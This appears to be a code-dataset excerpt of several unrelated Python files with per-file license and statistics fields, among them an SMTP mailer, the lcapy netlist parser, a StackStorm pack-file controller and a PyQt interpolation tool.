smtp_port = '587'
from_add = "noreply@example.com"
def __init__(self, receiver, subject, body, filepath, filename):
self.receiver = receiver
self.subject = subject
self.body = body
self.filepath = filepath
self.filename = filename
self.msg = MIMEMultipart('alternative')
def attach_attachment(self):
part = MIMEApplication(open(self.filepath , "rb").read())
part.add_header('Content-Disposition', 'attachment', filename=filename)
self.msg.attach(part)
def send_mail(self):
self.msg['Subject'] = "Your S3 Details"
self.msg['From'] = self.from_add
self.msg['To'] = self.receiver
# text = "Please find the attachment for the s3 bucket details"
part1 = MIMEText(self.body, 'plain')
self.msg.attach(part1)
mail = smtplib.SMTP(host = self.smtp_server, port = self.smtp_port, timeout = 10)
mail.set_debuglevel(10)
mail.starttls()
mail.ehlo()
mail.login(self.smtp_username,self.smtp_password)
mail.sendmail(self.from_add, self.receiver, self.msg.as_string())
mail.quit()
|
apache-2.0
| 7,089,824,654,200,791,000
| 29.020408
| 89
| 0.639701
| false
| 3.771795
| false
| false
| false
|
mph-/lcapy
|
lcapy/parser.py
|
1
|
8849
|
"""This module performs parsing of SPICE-like netlists. It uses a
custom parser rather than lex/yacc to give better error messages.
Copyright 2015--2020 Michael Hayes, UCECE
"""
import re
# Could use a script to generate parser and parsing tables if speed
# was important.
def split(s, delimiters):
"""Split string by specified delimiters but not if a delimiter is
within curly brackets {} or ""."""
parts = []
current = []
close_bracket = ''
bracket_stack = []
for c in (s + delimiters[0]):
if c in delimiters and len(bracket_stack) == 0:
if len(current) > 0:
parts.append(''.join(current))
current = []
else:
if c == close_bracket:
close_bracket = bracket_stack.pop()
elif c == '{':
bracket_stack.append(close_bracket)
close_bracket = '}'
elif c == '"':
bracket_stack.append(close_bracket)
close_bracket = '"'
current.append(c)
if close_bracket != '':
raise ValueError('Missing %s in %s' % (close_bracket, s))
return parts
class Param(object):
def __init__(self, name, base, comment):
self.name = name
self.base = base
self.comment = comment
self.baseclass = None
def is_valid(self, string):
if self.baseclass is None:
return True
return self.baseclass.is_valid(string)
class Rule(object):
def __init__(self, cpt_type, classname, params, comment, pos):
self.type = cpt_type
self.classname = classname
self.params = params
self.comment = comment
self.pos = pos
def __repr__(self):
return self.type + 'name ' + ' '.join(self.params)
def syntax_error(self, error, string):
raise ValueError('Syntax error: %s when parsing %s\nExpected format: %s' % (error, string, repr(self)))
def process(self, paramdict, string, fields, name, namespace):
params = self.params
if len(fields) > len(params):
extra = ''
if '(' in string:
extra = ' (perhaps enclose expressions with parentheses in {})'
self.syntax_error('Too many args' + extra, string)
nodes = []
args = []
for m, param in enumerate(params):
if m >= len(fields):
# Optional argument
if param[0] == '[':
break
self.syntax_error('Missing arg %s' % param, string)
if param[0] == '[':
param = param[1:-1]
field = fields[m]
if paramdict[param].base in ('pin', 'node'):
if field[0] == '.':
# Note, name contains namespace
field = name + field
else:
field = namespace + field
nodes.append(field)
elif paramdict[param].base != 'keyword':
args.append(field)
return tuple(nodes), args
class Parser(object):
def __init__(self, cpts, grammar, allow_anon=False):
"""cpts is a module containing a class for each component
grammar is a module defining the syntax of a netlist"""
# A string defining the syntax for a netlist
rules = grammar.rules
# A string defining parameters
params = grammar.params
# A string defining delimiter characters
self.delimiters = grammar.delimiters
# A string defining comment characters
self.comments = grammar.comments
self.allow_anon = allow_anon
self.cpts = cpts
self.paramdict = {}
self.ruledict = {}
for param in params.split('\n'):
self._add_param(param)
for rule in rules.split('\n'):
self._add_rule(rule)
cpts = sorted(self.ruledict.keys(), key=len, reverse=True)
# The symbol name must be a valid Sympy symbol name so
# it cannot include symbols such as + and -.
self.cpt_pattern = re.compile("(%s)([#_\w'?]+)?" % '|'.join(cpts))
def _add_param(self, string):
if string == '':
return
fields = string.split(':')
paramname = fields[0]
fields = fields[1].split(';', 1)
parambase = fields[0].strip()
comment = fields[1].strip()
self.paramdict[paramname] = Param(paramname, parambase, comment)
def _add_rule(self, string):
if string == '':
return
fields = string.split(':')
cpt_classname = fields[0]
fields = fields[1].split(';', 1)
string = fields[0].strip()
comment = fields[1].strip()
fields = string.split(' ')
params = fields[1:]
# Skip the name part in the rule, e.g., only consider D from Dname.
cpt_type = fields[0][0:-4]
pos = None
for m, param in enumerate(params):
if param[0] == '[':
param = param[1:-1]
if param not in self.paramdict:
raise ValueError('Unknown parameter %s for %s' % (param, string))
if pos is None and self.paramdict[param].base == 'keyword':
pos = m
if cpt_type not in self.ruledict:
self.ruledict[cpt_type] = ()
self.ruledict[cpt_type] += (Rule(cpt_type, cpt_classname,
params, comment, pos), )
def parse(self, string, namespace='', parent=None):
"""Parse string and create object"""
directive = False
net = string.strip()
if net == '':
directive = True
elif net[0] in self.comments:
directive = True
elif net[0] == ';':
directive = True
elif net[0] == '.':
directive = True
if directive:
cpt_type = 'XX'
cpt_id = ''
name = 'XX'
name += parent._make_anon(cpt_type)
defname = namespace + cpt_type + cpt_id
if string.startswith(';') and not string.startswith(';;'):
opts_string = string[1:]
else:
opts_string = ''
return self.cpts.make('XX', parent, '', defname, name,
cpt_type, cpt_id, string, opts_string, (), '')
net = namespace + net
parts = net.split(';', 1)
fields = split(parts[0], self.delimiters)
# Strip {} and "".
for m, field in enumerate(fields):
if field[0] in '{"':
fields[m] = fields[m][1:-1]
name = fields.pop(0)
parts = name.split('.')
namespace = ''
if len(parts) > 1:
namespace = '.'.join(parts[0:-1]) + '.'
name = parts[-1]
match = self.cpt_pattern.match(name)
if match is None:
raise ValueError('Unknown component %s while parsing "%s"' % (name, net))
groups = match.groups()
cpt_type, cpt_id = groups[0], groups[1]
if cpt_id is None:
cpt_id = ''
# This is the most hackery aspect of this parser where we
# choose the rule pattern based on a keyword. If the
# keyword is not present, default to first rule pattern.
# Perhaps a factory should sort this out?
rule = self.ruledict[cpt_type][0]
keyword = ''
for rule1 in self.ruledict[cpt_type]:
pos = rule1.pos
if pos is None:
continue
if len(fields) > pos and fields[pos].lower() == rule1.params[pos]:
rule = rule1
keyword = rule1.params[pos]
break
defname = namespace + cpt_type + cpt_id
name = defname
if (cpt_id == '' and parent is not None
and (cpt_type in ('A', 'W', 'O', 'P')) or self.allow_anon):
name += parent._make_anon(cpt_type)
elif cpt_id == '?':
# Automatically name cpts to ensure they are unique
name = name[:-1] + parent._make_anon(cpt_type)
nodes, args = rule.process(self.paramdict, net, fields, name,
namespace)
parts = net.split(';', 1)
opts_string = parts[1].strip() if len(parts) > 1 else ''
keyword = (pos, keyword)
# self.cpts is either the mnacpts or schematic module
return self.cpts.make(rule.classname, parent, namespace,
defname, name, cpt_type, cpt_id, net,
opts_string, tuple(nodes), keyword,
*args)
|
lgpl-2.1
| 5,817,020,142,593,945,000
| 30.716846
| 119
| 0.508984
| false
| 4.191852
| false
| false
| false
|
OSEHRA/VistA
|
Scripts/ExternalDownloader.py
|
1
|
4599
|
#---------------------------------------------------------------------------
# Copyright 2013-2019 The Open Source Electronic Health Record Alliance
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#---------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import object
import sys
import os
import urllib.request, urllib.parse, urllib.error
from LoggerManager import logger, initConsoleLogging
from ConvertToExternalData import generateExternalDataFileName
from ConvertToExternalData import generateSha1Sum
"""
Download External Data
"""
DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL = "https://code.worldvista.org/content/SHA1"
""" find or download the external KIDS Build file, return the file path """
def obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir):
assert cacheDir and os.path.exists(cacheDir)
rootDir = os.path.dirname(filePath)
externalFileName = generateExternalDataFileName(sha1Sum)
externalFile = os.path.join(rootDir, externalFileName)
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" try to find the file in the cache dir """
externalFile = os.path.join(cacheDir, externalFileName.replace('_','/'))
logger.info("Checking %s" % externalFile)
if os.path.exists(externalFile):
if generateSha1Sum(externalFile) == sha1Sum:
return (True, externalFile)
else:
os.remove(externalFile)
""" make sure cacheDir has the right layout """
rootDir = os.path.dirname(externalFile)
if not os.path.exists(rootDir):
os.makedirs(rootDir)
""" download from remote """
extDownloader = ExternalDataDownloader()
logger.info("Downloading from remote link")
result = extDownloader.downloadExternalDataByHash(sha1Sum, externalFile)
if not result:
logger.error("Downloading from remote failed")
if os.path.exists(externalFile):
os.remove(externalFile)
externalFile = None
logger.info("%s, %s" % (result, externalFile))
return (result, externalFile)
class ExternalDataDownloader(object):
def __init__(self, siteUrl=DEFAULT_EXTERNAL_DOWNLOAD_SITE_URL):
self._siteUrl = siteUrl
"""
"""
@staticmethod
def downloadExternalDataDirectly(dwnUrl, fileToSave):
try:
urllib.request.urlretrieve(dwnUrl, fileToSave)
return True
except Exception as ex:
logger.error(ex)
return False
"""
"""
def downloadExternalDataByHash(self, sha1Sum, fileToSave):
dwnUrl = "%s/%s" % (self._siteUrl, sha1Sum)
if not self.downloadExternalDataDirectly(dwnUrl, fileToSave):
return False
""" verify the sha1sum of downloaded file """
sha1SumDwn = generateSha1Sum(fileToSave)
if sha1Sum == sha1SumDwn:
return True
logger.error("sha1Sum mismatch %s:%s" % (sha1Sum, sha1SumDwn))
os.remove(fileToSave)
def main():
initConsoleLogging()
# testing the PatchFileBySha1
logger.info(sys.argv)
PatchFileBySha1(sys.argv[1], sys.argv[2], sys.argv[3])
def downloadAllKIDSSha1File(topDir, cacheDir):
from ConvertToExternalData import isValidKIDSBuildSha1Suffix
from ConvertToExternalData import readSha1SumFromSha1File
import shutil
initConsoleLogging()
absCurDir = os.path.abspath(topDir)
for (root, dirs, files) in os.walk(absCurDir):
for f in files:
if not isValidKIDSBuildSha1Suffix(f):
continue
filePath = os.path.join(root, f)
sha1Sum = readSha1SumFromSha1File(filePath)
result, extFilePath = obtainKIDSBuildFileBySha1(filePath, sha1Sum, cacheDir)
if result:
destFile = filePath[:filePath.rfind('.')]
if os.path.exists(destFile) and generateSha1Sum(destFile) == sha1Sum:
logger.info("%s is already current" % destFile)
continue
logger.info("%s => %s" % (extFilePath, destFile))
shutil.copyfile(extFilePath, destFile)
if __name__ == '__main__':
#main()
downloadAllKIDSSha1File(sys.argv[1], sys.argv[2])
|
apache-2.0
| 1,417,033,469,209,968,000
| 36.08871
| 82
| 0.702979
| false
| 3.720874
| false
| false
| false
|
PnCevennes/SaisieChasse
|
modules/chasse/routes.py
|
1
|
2687
|
#coding: utf8
from flask import Blueprint, request
import json
from sqlalchemy import select
from server import db
from .models import VLieuTirSynonymes, PlanChasse, SaisonChasse
from ..utils.utilssqlalchemy import json_resp
ltroutes = Blueprint('lieux_tir', __name__)
@ltroutes.route('/', methods=['GET'])
@ltroutes.route('/<int:id>', methods=['GET'])
@json_resp
def get_lieutirsyn(id = None):
q = db.session.query(VLieuTirSynonymes)
if request.args.get('code_com') :
print 'code_com', request.args.get('code_com')
q = q.filter_by(code_com = request.args.get('code_com'))
if id:
q = q.filter_by(id=id)
data = q.all()
return [attribut.as_dict() for attribut in data]
@ltroutes.route('/communes', methods=['GET'])
@json_resp
def get_communes():
data = db.session \
.query(VLieuTirSynonymes.nom_com, VLieuTirSynonymes.code_com) \
.distinct(VLieuTirSynonymes.nom_com).all()
return [{"value" : attribut.nom_com, "id" : int(attribut.code_com) } for attribut in data]
pcroutes = Blueprint('plan_chasse', __name__)
@pcroutes.route('/bracelet/<int:id>', methods=['GET'])
@json_resp
def get_bracelet_detail(id = None):
data = db.session.query(PlanChasse).filter_by(id=id).first()
return data.as_dict()
@pcroutes.route('/bracelet/<int:id>', methods=['POST', 'PUT'])
def insertupdate_bracelet_detail(id = None):
data = json.loads(request.data)
o = PlanChasse(**data)
db.session.merge(o)
try:
db.session.commit()
return json.dumps({'success':True, 'message':'Enregistrement sauvegardé avec success'}), 200, {'ContentType':'application/json'}
except Exception as e:
db.session.rollback()
return json.dumps({'success':False, 'message':'Impossible de sauvegarder l\'enregistrement'}), 500, {'ContentType':'application/json'}
@pcroutes.route('/auteurs', methods=['GET'])
@json_resp
def get_auteurs():
s1 = select([PlanChasse.auteur_tir]).distinct()
s2 = select([PlanChasse.auteur_constat]).distinct()
q = s1.union(s2).alias('auteurs')
data = db.session.query(q).all()
return [{"auteur_tir" : a }for a in data]
@pcroutes.route('/saison', methods=['GET'])
@json_resp
def get_saison_list():
data = db.session.query(SaisonChasse).all()
return [a.as_dict() for a in data]
@pcroutes.route('/bracelets_list/<int:saison>', methods=['GET'])
@json_resp
def get_bracelet_list(saison = None):
data = db.session \
.query(PlanChasse.id, PlanChasse.no_bracelet) \
.filter_by(fk_saison = saison)\
.distinct().all()
return [{"no_bracelet" : attribut.no_bracelet, "id" : int(attribut.id) } for attribut in data]
|
gpl-3.0
| 5,255,791,992,090,212,000
| 31.361446
| 142
| 0.661579
| false
| 2.94195
| false
| false
| false
|
yehudagale/fuzzyJoiner
|
old/matcher.py
|
1
|
1840
|
#using tutorial https://suhas.org/sqlalchemy-tutorial/
from sys import argv
from matcher_functions import *
#establish connection to database
con, meta = connect(argv[1], argv[2], argv[3])
#load pairs from database
aliases = get_aliases(con, meta)
#create dictionaries assingning serial numbers to names and names from serial numbers
num_to_word, word_to_num = create_double_num_dicts(aliases)
#load the buckets from the database bucket_list is aranges as follows:
#bucket_list[pair_of_buckets][bucket(this must be 0 or 1)][name (this represents a single name)][0 for number and 1 for pre-procced name]
bucket_list, bucket_words = load_good_buckets('wordtable1', 'wordtable2', word_to_num, con, meta)
#print out the number of names that are possible to get just based on bucketing:
impossible = get_impossible(aliases, bucket_list, num_to_word)
print("possible matches: " + str(len(aliases) - len(impossible)))
#next make a list to store the outcomes of all our tests:
matches_list = []
#then run our tests
matches_list.append(run_test(lambda x : x.replace(" ", ""), lambda name1, name2 : name1 in name2 or name2 in name1, num_to_word, bucket_list))
matches_list.append(run_test(lambda x : set(x.split()), lambda name1, name2 : name1.issubset(name2) or name2.issubset(name1), num_to_word, bucket_list))
matches_list.append(run_special_test(bucket_list, num_to_word))
#next create a test dictionary relating each item in the first set to k items in other set
test_dict = make_test_dict(set([]).union(*matches_list), 1000)
#use this dictionary to calculate and print the f-score
print("fscore: " + str(fscore(aliases, test_dict, 1)))
#next export the items we missed
export_missed(aliases, test_dict, con, meta)
#lastly export the items we could not have gotten since they were not in the same bucket:
export_unbucketed(impossible, con, meta)
|
epl-1.0
| 5,213,486,929,230,568,000
| 62.482759
| 152
| 0.756522
| false
| 3.309353
| true
| false
| false
|
chiffa/PolyPharma
|
bioflow/db_importers/hint_importer.py
|
2
|
1976
|
"""
Set of tools to work with HiNT database
"""
from bioflow.bio_db_parsers.proteinRelParsers import parse_hint
from bioflow.configs.main_configs import hint_csv_path
from bioflow.neo4j_db.GraphDeclarator import DatabaseGraph
from bioflow.utils.log_behavior import get_logger
log = get_logger(__name__)
def get_uniprots_for_hint():
"""
Recovers UP Gene names maps to UNIPROT nodes containing them.
:return:
"""
initial_dict = {}
for node in DatabaseGraph.get_all('UNIPROT'):
initial_dict[node['legacyID']] = node.id
for key in list(initial_dict.keys()):
initial_dict[key.split('_')[0]] = initial_dict.pop(key)
return initial_dict
def cross_ref_hint():
"""
Pulls Hint relationships and connects deprecated_reached_uniprots_neo4j_id_list in the database
:return:
"""
relations_dict = parse_hint(hint_csv_path)
uniprot_ref_dict = get_uniprots_for_hint()
processed_nodes = set()
actual_cross_links = 0
breakpoints = 300
size = len(relations_dict)
log.info('Starting inserting HINT for %s primary nodes' % size)
for i, (legacyId, linked_legacyIds) in enumerate(relations_dict.items()):
if i % breakpoints:
# TODO: [progress bar]
log.info('\t %.2f %%' % (float(i) / float(size) * 100))
if legacyId in list(uniprot_ref_dict.keys()):
for linked_legacyId in linked_legacyIds:
if linked_legacyId in list(uniprot_ref_dict.keys()):
actual_cross_links += 1
DatabaseGraph.link(uniprot_ref_dict[legacyId], uniprot_ref_dict[linked_legacyId],
'is_interacting',
{'source': 'HINT',
'parse_type': 'physical_entity_molecular_interaction'})
log.info('HINT Cross-links: %s, HINT processed nodes: %s',
actual_cross_links, len(processed_nodes))
|
bsd-3-clause
| 8,683,032,263,872,799,000
| 30.870968
| 101
| 0.610324
| false
| 3.659259
| false
| false
| false
|
pni-libraries/python-pni
|
pkgconfig.py
|
1
|
3517
|
from __future__ import print_function
import sys
try:
from subprocess import check_output
def execute(lt):
return check_output(lt)
except Exception:
from subprocess import Popen
from subprocess import PIPE
def execute(lt):
p = Popen(lt, stdout=PIPE)
result = ""
for x in p.stdout:
result += x
return result
def strip_string_list(inlist):
"""
strip_string_list(inlist):
Strip all strings in a list of strings from all leading and
trailing blanks.
input arguments:
inlist ............ input list of strings
return:
new list with all strings stripped.
"""
lt = []
for value in inlist:
lt.append(value.strip())
return lt
def remove_empty_strings(inlist):
"""
remove_empty_strings(inlist):
Remove all empty strings from the list of strings.
input arguments:
inlist ............. inpust list of strings
return:
list without empty strings
"""
cnt = inlist.count('')
outlist = list(inlist)
for i in range(cnt):
outlist.remove('')
return outlist
def split_result(result, key):
result = result.strip()
result = result.split(key)
result = remove_empty_strings(result)
return result
class package(object):
command = 'pkg-config'
def __init__(self, pkgname):
self.name = pkgname
def _decode(self, data):
if sys.version_info.major >= 3:
return data.decode('utf-8')
else:
return data
def _get_library_dirs(self):
result = self._decode(
execute([self.command, '--libs-only-L', self.name]))
result = split_result(result, '-L')
return strip_string_list(result)
def _get_include_dirs(self):
result = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
result = split_result(result, '-I')
return strip_string_list(result)
def _get_libraries(self):
result = self._decode(
execute([self.command, '--libs-only-l', self.name]))
result = split_result(result, '-l')
return strip_string_list(result)
def _get_compiler_flags(self):
# first we obtain all compiler flags
total_result = self._decode(
execute([self.command, '--cflags', self.name]))
total_result = total_result.strip()
total_result = total_result.split(" ")
total_result = remove_empty_strings(total_result)
# now we have to obtain all the include files
includes = self._decode(
execute([self.command, '--cflags-only-I', self.name]))
includes = includes.strip()
includes = includes.split(" ")
includes = remove_empty_strings(includes)
for header in includes:
total_result.remove(header)
return total_result
library_dirs = property(_get_library_dirs)
libraries = property(_get_libraries)
compiler_flags = property(_get_compiler_flags)
include_dirs = property(_get_include_dirs)
# testing routine
if __name__ == "__main__":
if len(sys.argv) < 2:
print("You have to pass a package name to as a command line argument!")
sys.exit()
name = sys.argv[1]
p = package(name)
print("library directories: ", p.library_dirs)
print("libraries : ", p.libraries)
print("compiler flags : ", p.compiler_flags)
print("include directories: ", p.include_dirs)
|
gpl-2.0
| 9,147,892,070,350,756,000
| 23.943262
| 79
| 0.598521
| false
| 3.987528
| false
| false
| false
|
tonybaloney/st2
|
st2api/st2api/controllers/v1/packviews.py
|
1
|
8858
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import codecs
import mimetypes
import os
import six
from wsgiref.handlers import format_date_time
from st2api.controllers.v1.packs import BasePacksController
from st2common.exceptions.db import StackStormDBObjectNotFoundError
from st2common import log as logging
from st2common.models.api.pack import PackAPI
from st2common.persistence.pack import Pack
from st2common.content.utils import get_pack_file_abs_path
from st2common.rbac.types import PermissionType
from st2common.rbac import utils as rbac_utils
from st2common.router import abort
from st2common.router import Response
http_client = six.moves.http_client
__all__ = [
'FilesController',
'FileController'
]
http_client = six.moves.http_client
LOG = logging.getLogger(__name__)
BOM_LEN = len(codecs.BOM_UTF8)
# Maximum file size in bytes. If the file on disk is larger then this value, we don't include it
# in the response. This prevents DDoS / exhaustion attacks.
MAX_FILE_SIZE = (500 * 1000)
# File paths in the file controller for which RBAC checks are not performed
WHITELISTED_FILE_PATHS = [
'icon.png'
]
class BaseFileController(BasePacksController):
model = PackAPI
access = Pack
supported_filters = {}
query_options = {}
def get_all(self):
return abort(404)
def _get_file_size(self, file_path):
return self._get_file_stats(file_path=file_path)[0]
def _get_file_stats(self, file_path):
try:
file_stats = os.stat(file_path)
except OSError:
return (None, None)
return file_stats.st_size, file_stats.st_mtime
def _get_file_content(self, file_path):
with codecs.open(file_path, 'rb') as fp:
content = fp.read()
return content
def _process_file_content(self, content):
"""
This method processes the file content and removes unicode BOM character if one is present.
Note: If we don't do that, files view explodes with "UnicodeDecodeError: ... invalid start
byte" because the json.dump doesn't know how to handle BOM character.
"""
if content.startswith(codecs.BOM_UTF8):
content = content[BOM_LEN:]
return content
class FilesController(BaseFileController):
"""
Controller which allows user to retrieve content of all the files inside the pack.
"""
def __init__(self):
super(FilesController, self).__init__()
self.get_one_db_method = self._get_by_ref_or_id
def get_one(self, ref_or_id, requester_user):
"""
Outputs the content of all the files inside the pack.
Handles requests:
GET /packs/views/files/<pack_ref_or_id>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=PermissionType.PACK_VIEW)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
pack_ref = pack_db.ref
pack_files = pack_db.files
result = []
for file_path in pack_files:
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
continue
file_size = self._get_file_size(file_path=normalized_file_path)
if file_size is not None and file_size > MAX_FILE_SIZE:
LOG.debug('Skipping file "%s" which size exceeds max file size (%s bytes)' %
(normalized_file_path, MAX_FILE_SIZE))
continue
content = self._get_file_content(file_path=normalized_file_path)
include_file = self._include_file(file_path=file_path, content=content)
if not include_file:
LOG.debug('Skipping binary file "%s"' % (normalized_file_path))
continue
item = {
'file_path': file_path,
'content': content
}
result.append(item)
return result
def _include_file(self, file_path, content):
"""
Method which returns True if the following file content should be included in the response.
Right now we exclude any file with UTF8 BOM character in it - those are most likely binary
files such as icon, etc.
"""
if codecs.BOM_UTF8 in content[:1024]:
return False
if "\0" in content[:1024]:
# Found null byte, most likely a binary file
return False
return True
class FileController(BaseFileController):
"""
Controller which allows user to retrieve content of a specific file in a pack.
"""
def get_one(self, ref_or_id, file_path, requester_user, if_none_match=None,
if_modified_since=None):
"""
Outputs the content of a specific file in a pack.
Handles requests:
GET /packs/views/file/<pack_ref_or_id>/<file path>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
if not file_path:
raise ValueError('Missing file path')
pack_ref = pack_db.ref
# Note: Until list filtering is in place we don't require RBAC check for icon file
permission_type = PermissionType.PACK_VIEW
if file_path not in WHITELISTED_FILE_PATHS:
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=permission_type)
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
raise StackStormDBObjectNotFoundError('File "%s" not found' % (file_path))
file_size, file_mtime = self._get_file_stats(file_path=normalized_file_path)
response = Response()
if not self._is_file_changed(file_mtime,
if_none_match=if_none_match,
if_modified_since=if_modified_since):
response.status = http_client.NOT_MODIFIED
else:
if file_size is not None and file_size > MAX_FILE_SIZE:
msg = ('File %s exceeds maximum allowed file size (%s bytes)' %
(file_path, MAX_FILE_SIZE))
raise ValueError(msg)
content_type = mimetypes.guess_type(normalized_file_path)[0] or \
'application/octet-stream'
response.headers['Content-Type'] = content_type
response.body = self._get_file_content(file_path=normalized_file_path)
response.headers['Last-Modified'] = format_date_time(file_mtime)
response.headers['ETag'] = repr(file_mtime)
return response
def _is_file_changed(self, file_mtime, if_none_match=None, if_modified_since=None):
# For if_none_match check against what would be the ETAG value
if if_none_match:
return repr(file_mtime) != if_none_match
# For if_modified_since check against file_mtime
if if_modified_since:
return if_modified_since != format_date_time(file_mtime)
# Neither header is provided therefore assume file is changed.
return True
class PackViewsController(object):
files = FilesController()
file = FileController()
|
apache-2.0
| -378,968,515,113,438,460
| 35.00813
| 99
| 0.623166
| false
| 4.033698
| false
| false
| false
|
rafaelperazzo/iCalcNum
|
interpolacao.main.py
|
1
|
10021
|
# -*- coding: utf-8 -*-
import sys
import interpolacao as z
from interpolacaoUi import *
import numpy as np
import pylab as plt
from sympy import *
from PyQt4.QtGui import *
reload(sys)
sys.setdefaultencoding('utf8')
def str2list(texto):
resultado = map(float,texto.split())
if type(resultado) is list:
return True
else:
return False
def mensagem(tipo,titulo,texto,detalhes):
msg = QMessageBox()
if tipo==0:
msg.setIcon(QMessageBox.Information)
elif tipo==1:
msg.setIcon(QMessageBox.Warning)
elif tipo==2:
msg.setIcon(QMessageBox.Critical)
msg.setText(texto)
msg.setInformativeText(u'Informações adicionais')
msg.setWindowTitle(titulo)
msg.setDetailedText(detalhes)
msg.setStandardButtons(QMessageBox.Ok)
retval = msg.exec_()
def entradaValida():
input1 = False
input2 = False
input3 = False
input4 = False
input5 = False
if ui.txtX.text()!='':
input1 = True
if ui.txtY.text()!='':
input2 = True
if ui.txtPrecisao.text()!='':
input3 = True
if ui.txtPonto.text()!='':
input4 = True
if ui.txtQuantidade.text()!='':
input5 = True
try:
if not str2list(str(ui.txtX.text())):
input1 = False
if not str2list(str(ui.txtY.text())):
input2 = False
numerico = float(ui.txtPrecisao.text())
numerico = float(ui.txtPonto.text())
numerico = float(ui.txtQuantidade.text())
except ValueError as e:
input1 = False
if input1 and input2 and input3 and input4 and input5:
return True
else:
return False
def cmbMetodoChanged():
metodo = ui.cmbMetodo.currentIndex()
if metodo==0:
ui.txtPonto.setDisabled(True)
elif metodo==1:
ui.txtPonto.setDisabled(False)
elif metodo==2:
ui.txtPonto.setDisabled(False)
elif metodo==3:
ui.txtPonto.setDisabled(False)
#FUNCAO DO CLICK DO BOTAO
def btnCalcularClick():
if entradaValida():
ui.txtResultado.clear()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0: #MINIMOS QUADRADOS
resultado = z.minimosQuadrados(eixoX,eixoY,precisao)
ui.txtResultado.append('***************')
ui.txtResultado.append('a0')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'a1')
ui.txtResultado.append('***************************')
ui.txtResultado.append(str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Função')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(x)= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==1: #splines lineares
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Splines')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Índice')
ui.txtResultado.append('***************************')
ui.txtResultado.append('Utilizando o spline: ' + str(resultado[1]+1))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Interpolação no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(' + str(ponto) +')= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==2: #LAGRANGE
ponto = float(ui.txtPonto.text())
resultado = z.lagrange(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
else: #DIFERENÇAS DIVIDIDAS
ponto = float(ui.txtPonto.text())
resultado = z.newton(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Diferenças divididas')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[3]))
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
#expressao = sympify(resultado[1])
#expressao = pretty(expressao,use_unicode=False)
#print expressao
#ui.txtResultado.append(expressao)
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
#print(resultado[3])
#print(resultado[1])
else:
#QMessageBox.critical(None,'Erro!',u'Entrada Inválida!',QMessageBox.Ok)
mensagem(2,u'Erro!',u'Entrada inválida!',u'Os dados de entrada devem ser numéricos!')
